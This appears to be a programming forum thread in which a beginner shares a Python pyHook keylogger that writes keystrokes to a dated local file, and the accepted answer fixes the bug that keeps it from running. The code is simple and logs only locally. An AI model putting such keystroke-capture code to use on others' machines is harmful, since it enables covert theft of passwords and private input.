# Python Keylogger with some features

Tags: python, python-2.7, logging, keylogger, pyhook

I just started to program in Python. My first "project" is a keylogger. I've read several lines of code posted on here and other forums. I wrote this code, which should log pressed keys and begin a new line within the .txt file everytime the enter key is hit. Could somebody please give me some advice?

```
import pythoncom, pyHook
from datetime import datetime
date_today = datetime.now().strftime('%Y-%b-%d')
file_log = 'C:\\Users\\admin\\Desktop\\Python\\logs\\'+date_today+'.txt' 

def OnKeyboardEvent(event):
    if event.Ascii:
        log = open(file_log,"a")
        char = chr(event.Ascii)
        if event.Ascii == 13:
            log.write('\n')
        log.write(char)

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent()
hm.HookKeyboard()
pythoncom.PumpMessages()
```

Thanks and best regards!

**Edit:** The file doesn't seem to start, as no new process or log file is created upon start

Comment: Advice on what? Is something not working?

Answer (score 2, accepted):

Compare with example at https://sourceforge.net/p/pyhook/wiki/PyHook_Tutorial/

You'll see your line

```
hm.KeyDown = OnKeyboardEvent()
```

should not have the trailing `()`. You want KeyDown to get the function, not the results of the function.